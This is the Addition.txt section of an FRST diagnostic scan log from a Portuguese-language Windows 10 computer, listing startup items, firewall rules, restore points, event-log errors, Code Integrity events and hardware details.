==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

HKLM\...\StartupApproved\StartupFolder: => "Inicialização Rápida do Solidworks 2014.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Aplicativo de Download Automático do SolidWorks.lnk"
HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\StartupApproved\Run: => "Akamai NetSession Interface"

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{C47E57DA-4191-4DA0-AF2E-5614AF4B317E}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [{5FA1C321-9B8C-45DE-9FCC-2AC160A7F0EC}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [UDP Query User{CA035A35-4CA8-40C4-995D-14EBC95741EA}C:\program files (x86)\maxthon\bin\maxthon.exe] => (Allow) C:\program files (x86)\maxthon\bin\maxthon.exe FirewallRules: [TCP Query User{A7B9B130-B253-4C0C-AAB6-7007B90B6488}C:\program files (x86)\maxthon\bin\maxthon.exe] => (Allow) C:\program files (x86)\maxthon\bin\maxthon.exe FirewallRules: [{857723D4-D111-43A0-A9A8-96DA5254998B}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe FirewallRules: [{07A3E502-0A97-4DAE-945E-1927DCB9FA39}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{743D21E4-0A91-4646-B76B-E712FCA230DA}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{5EE15CE9-B687-4327-B389-2C0CF704A17D}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{030E56DF-B24A-41C9-9D8C-35B6B56EE5F5}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{6C122131-E5E3-4FE9-BC42-7E3AA4EE1CEA}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{01A6F848-B1FF-4E91-93CF-8E3A135E0071}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [UDP Query User{C7B0C57C-9C4A-42C7-908F-CFC21BE7DD72}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe FirewallRules: [TCP Query User{E55B8EA0-80E5-4845-858D-794D5224590E}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe FirewallRules: [{6B80180A-5FA5-4F04-BF41-5DDF45D5FD84}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe 
FirewallRules: [{4ACD1FD1-578D-4F9F-A953-BF7F7A00EDBB}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{B085A7C4-CA3C-49E7-BFFC-FA3ADD9AF076}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{0BBCDC32-B883-4956-9C26-59EA61133C17}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [UDP Query User{5FB426E9-B8DD-45B9-A10B-D439250E2BD8}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe FirewallRules: [TCP Query User{8EB802BA-99D9-4C30-B9A4-F030CDE32B0A}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe FirewallRules: [UDP Query User{8369AC53-5EC9-42B5-85DE-040CF0FC44E4}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [TCP Query User{45065BD2-D8A8-472E-AC45-EC93EFA5AF03}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe FirewallRules: [UDP Query User{43CB3289-3FB5-4193-B8CD-CB807DBEB200}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [TCP Query User{E5C37137-4421-43F0-9016-13E9AA351090}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe FirewallRules: [{3A5BA617-E2A4-4CFE-834D-53E1954103B1}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{32B11E99-46AE-4DA1-9AB5-73826512DDC1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{03E0815D-45CD-42BF-8BC5-F581D787A231}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: 
[{7048C7F2-37AD-4A33-82C5-4EFF3CD87651}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{3BE8B9FC-FBEE-4413-B91B-CAF15FCEE4E9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{781EA6A4-4F09-4DC5-A1A8-4A81A412164D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe FirewallRules: [{1EFD8FA6-33F3-4E2B-BE8E-D51155A99605}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe FirewallRules: [{B916BF38-0541-4C51-917D-B61ED25E2E82}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{2BC9CF4F-7C4B-460A-AB88-2C4C64FC64A1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe FirewallRules: [{E4ACB405-DDE3-4ACD-B2B3-48E67CB66A68}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe FirewallRules: [{B180E70D-0C76-4259-8E36-D24FA5192F35}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{C54B1C61-C082-482B-A98D-FD503942B19E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{DB1BC2C2-BC75-4FF4-AAF2-B41BCA871708}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{E7AD6073-5D36-4C53-A55D-790E9BC1512E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe FirewallRules: [{3C780E9F-A5D2-4F41-BBBD-4C14A80A65B3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe FirewallRules: [{617F487A-4693-4296-8628-3B65B6F8AF24}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{BA9BD23C-5620-45B5-B83C-CA095F8E0577}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [{FCC6378D-3124-4158-8D4F-F644588DA149}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [{DDD5220C-7CA5-4902-BF93-CCE3CC5D2789}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: 
[{D0EED423-A5B8-4815-B230-F23A5D40F02D}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe FirewallRules: [{F6C3E009-3BB8-46E9-B37E-0C042C38D52E}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe FirewallRules: [{5D684EE8-78F3-4F95-B3CB-36EEB2A16901}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{1F719180-3821-4E68-BBB9-A167D27F1B73}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{B15F9B45-4153-4B41-BF1E-B8F405894728}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{746F54FD-1C70-4B20-AEDA-E8AEE4068243}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{C9F70E75-5BE8-44FC-8965-A4951DB0A865}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{D4D82735-F642-4D0C-A422-8E14C4FB72C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{C18CB6CE-94F9-46DD-ACF5-0741F3063B83}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{0FDF9E73-9EDE-46C9-BA1E-A34462554A69}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [TCP Query User{8D2B2992-E994-4C57-AB32-F0F64E58AB73}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{1BDF3E28-BB2B-4BF2-AB37-70CA5913E636}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [TCP Query User{25374537-EBC8-40A4-AB9F-92DA2E5A6BA0}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{53A16881-8BED-46AB-B5B8-73126B5D2767}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) 
C:\users\gabri\appdata\local\akamai\netsession_win.exe FirewallRules: [{58A4089F-B65C-421A-BA9B-A09F8E370DBE}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{9CBA0D4B-A02C-4C3C-AE16-F3060F06E85A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{C20E5AB6-8116-4A34-B3B2-30106D2F9394}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{2F28AC03-D7C2-4045-8C0B-AF6E352BF2F2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{56AFD569-3AE9-4840-8FF2-B92C7F938D4D}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe FirewallRules: [{52EB445D-A0AF-47FC-B168-A4CF3D4CF9B0}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe FirewallRules: [{3E869D92-6DFC-49E8-B3D7-83F0BE93B9BD}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe FirewallRules: [{7A9A62DF-48BC-4DC6-B130-A6DFF39D4150}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe FirewallRules: [{4D7511F6-10B8-4443-8546-633E2F17CEF9}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe FirewallRules: [{F126518A-F0DE-4EE0-A5BB-7D2948B4B0A8}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe FirewallRules: [{408545C6-CE6A-4A8D-B616-FA8B84D0DE3C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{A803E33F-9845-436F-AB9C-7CAADBB43873}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{A18FECE9-799F-4F3D-AF13-5747104432BC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{8FBE25F7-7064-4F78-8026-21728E1B6931}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{A69523AD-66DB-4749-833D-171B1F149D2B}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: 
[{AAF4F598-2A65-4C84-94B3-D31F268FC3DF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [TCP Query User{E6B4284E-E1E6-4117-A7B8-2F451FA0F332}C:\program files (x86)\common files\nokia\fuse\fuseservice.exe] => (Allow) C:\program files (x86)\common files\nokia\fuse\fuseservice.exe FirewallRules: [UDP Query User{8659FB35-FAD8-48F6-9E89-6628830A2B3F}C:\program files (x86)\common files\nokia\fuse\fuseservice.exe] => (Allow) C:\program files (x86)\common files\nokia\fuse\fuseservice.exe FirewallRules: [TCP Query User{01EDDB8F-3911-40A7-BBAB-A5153FE880C9}C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe] => (Allow) C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe FirewallRules: [UDP Query User{E5AFAB87-4930-4594-81F5-A61E80E43CD5}C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe] => (Allow) C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe FirewallRules: [TCP Query User{ED7F16AA-3C35-42D9-AA01-F3A5AE450616}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe FirewallRules: [UDP Query User{2C41E6EA-2E9D-4382-9110-DF9BE5CD4D19}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe FirewallRules: [TCP Query User{158EEE99-E8E9-4FFB-A402-72707D11D8CC}C:\users\gabri\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\utorrent.exe FirewallRules: [UDP Query User{E1873135-FEEB-447E-A0BD-0ADCF2BD4BFF}C:\users\gabri\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\utorrent.exe FirewallRules: [TCP Query 
User{561F5DF3-5150-41AA-B2D7-AEF1EE1356C9}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe FirewallRules: [UDP Query User{6D650BA7-A479-4A43-83C7-2DC52C346FD1}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe FirewallRules: [{4535C5E7-DC5F-4C7B-8402-54A6DEF7BE1E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{786A8CC9-852C-4003-9B09-7DF1EC4CD96B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{1C9E9DEF-C471-4940-8973-4789DBB1FE76}] => (Allow) C:\Program Files (x86)\Mr DJ\Fallout New Vegas Ultimate Edition\FalloutNVLauncher.exe FirewallRules: [{D943BFCE-CB3F-4CDF-8BE5-A2BA9E091A78}] => (Allow) C:\Program Files (x86)\Mr DJ\Fallout New Vegas Ultimate Edition\FalloutNVLauncher.exe FirewallRules: [TCP Query User{589DDBFF-6D69-431B-BF71-53E2DBF2027C}C:\games\counter-strike global offensive\csgo.exe] => (Allow) C:\games\counter-strike global offensive\csgo.exe FirewallRules: [UDP Query User{F4E9A1BD-B760-44D5-BA7E-CB9D4C6AABFB}C:\games\counter-strike global offensive\csgo.exe] => (Allow) C:\games\counter-strike global offensive\csgo.exe ==================== Pontos de Restauração ========================= 24-08-2016 23:13:49 Windows Update 31-08-2016 07:03:18 Windows Update 02-09-2016 20:13:51 Removed Importação do SketchUp 2016. ==================== Dispositivos Apresentando Falhas No Gerenciador ============= ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Error: (09/04/2016 07:09:26 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. 
To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 24d8 Start Time: 01d206f8f3876da8 Termination Time: 12 Application Path: C:\Windows\System32\rundll32.exe Report Id: 3d1b2d4c-72ec-11e6-9c61-dc0ea101143d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 07:09:04 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 263c Start Time: 01d206f8ed306ac1 Termination Time: 15 Application Path: C:\Windows\System32\rundll32.exe Report Id: 2f9eaf01-72ec-11e6-9c61-dc0ea101143d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 07:08:51 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. 
Process ID: 243c Start Time: 01d206f8d4da332b Termination Time: 2 Application Path: C:\Windows\System32\rundll32.exe Report Id: 28256b72-72ec-11e6-9c61-dc0ea101143d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 03:15:55 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: AutoKMS.exe, version: 2.5.0.0, time stamp: 0x52aef33f Faulting module name: KERNELBASE.dll, version: 10.0.14393.0, time stamp: 0x57899809 Exception code: 0xe0434352 Fault offset: 0x0000000000017788 Faulting process id: 0x6b0 Faulting application start time: 0x01d206d77788daa1 Faulting application path: C:\WINDOWS\AutoKMS\AutoKMS.exe Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll Report Id: 6c655229-b962-44ed-b13a-21baddb2124d Faulting package full name: Faulting package-relative application ID: Error: (09/04/2016 03:15:54 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Aplicativo: AutoKMS.exe Versão do Framework: v4.0.30319 Descrição: O processo foi terminado devido a uma exceção sem tratamento. 
Informações da Exceção: System.ArgumentException em System.IO.FileStream..ctor(Microsoft.Win32.SafeHandles.SafeFileHandle, System.IO.FileAccess, Int32, Boolean) em ..() em System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) em System.Threading.ThreadHelper.ThreadStart() Error: (09/04/2016 03:10:32 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64 Faulting module name: ntdll.dll, version: 10.0.14393.103, time stamp: 0x57b7e207 Exception code: 0xc0000005 Fault offset: 0x000000000003061d Faulting process id: 0x9c0 Faulting application start time: 0x01d206d799fc7d00 Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll Report Id: aa68b49f-a14d-46e8-8274-82a7dbe69ad5 Faulting package full name: Faulting package-relative application ID: Error: (09/03/2016 06:57:42 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-G8E168K) Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023673 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (09/03/2016 06:57:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-G8E168K) Description: Activation of app Microsoft.LockApp_cw5n1h2txyewy!WindowsDefaultLockScreen failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information. 
Error: (09/03/2016 06:57:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2486) (User: DESKTOP-G8E168K) Description: App Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy+WindowsDefaultLockScreen did not launch within its allotted time. Error: (09/03/2016 06:28:34 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: AutoKMS.exe, version: 2.5.0.0, time stamp: 0x52aef33f Faulting module name: KERNELBASE.dll, version: 10.0.14393.0, time stamp: 0x57899809 Exception code: 0xe0434352 Fault offset: 0x0000000000017788 Faulting process id: 0x1794 Faulting application start time: 0x01d20611b4f451ca Faulting application path: C:\WINDOWS\AutoKMS\AutoKMS.exe Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll Report Id: c8a57f1d-3838-4bce-9dd7-460afef68178 Faulting package full name: Faulting package-relative application ID: Erros de Sistema: ============= Error: (09/04/2016 07:16:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-G8E168K) Description: The server Cortana.ActionUris.ActionUri did not register with DCOM within the required timeout. Error: (09/04/2016 07:15:19 PM) (Source: Microsoft-Windows-NDIS) (EventID: 10317) (User: AUTORIDADE NT) Description: Miniport TAP-Windows Adapter V9 #3, {697C671E-F8A8-42A0-86E2-9A82F6FD67A4}, had event 76 Error: (09/04/2016 07:11:54 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT) Description: The específico do aplicativo permission settings do not grant Local Ativação permission for the COM Server application with CLSID {8D8F4F83-3594-4F07-8369-FC3C3CAE4919} and APPID {F72671A9-012C-4725-9D2F-2A4D32D65169} to the user AUTORIDADE NT\SISTEMA SID (S-1-5-18) from address LocalHost (Usando LRPC) running in the application container Não Disponível SID (Não Disponível). This security permission can be modified using the Component Services administrative tool. 
Error: (09/04/2016 07:06:55 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 8 0x0 0x0 Error: (09/04/2016 07:06:53 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 2 0xdeaddeed 0xeeec Error: (09/04/2016 07:06:53 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 1 0xc 0x4 Error: (09/04/2016 06:27:39 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT) Description: The específico do aplicativo permission settings do not grant Local Ativação permission for the COM Server application with CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} and APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} to the user AUTORIDADE NT\SISTEMA SID (S-1-5-18) from address LocalHost (Usando LRPC) running in the application container Não Disponível SID (Não Disponível). This security permission can be modified using the Component Services administrative tool. Error: (09/04/2016 05:20:44 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 8 0x0 0x0 Error: (09/04/2016 05:20:41 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. Code: 2 0xdeaddeed 0xeeec Error: (09/04/2016 05:20:41 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT) Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter. 
Code: 1 0xc 0x4

CodeIntegrity:
===================================

Date: 2016-09-03 22:03:20.241
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvami.inf_amd64_fd2cdd92cf7ee187\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-03 22:03:19.712
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 22:12:25.544
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-02 22:12:25.330
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentagem de memória em uso: 32%
RAM física total: 8069.53 MB
RAM física disponível: 5454.95 MB
Virtual Total: 9349.53 MB
Virtual disponível: 6780.58 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:697.92 GB) (Free:471.71 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 7AB4F75A)
Partition: GPT.

==================== Fim de Addition.txt ============================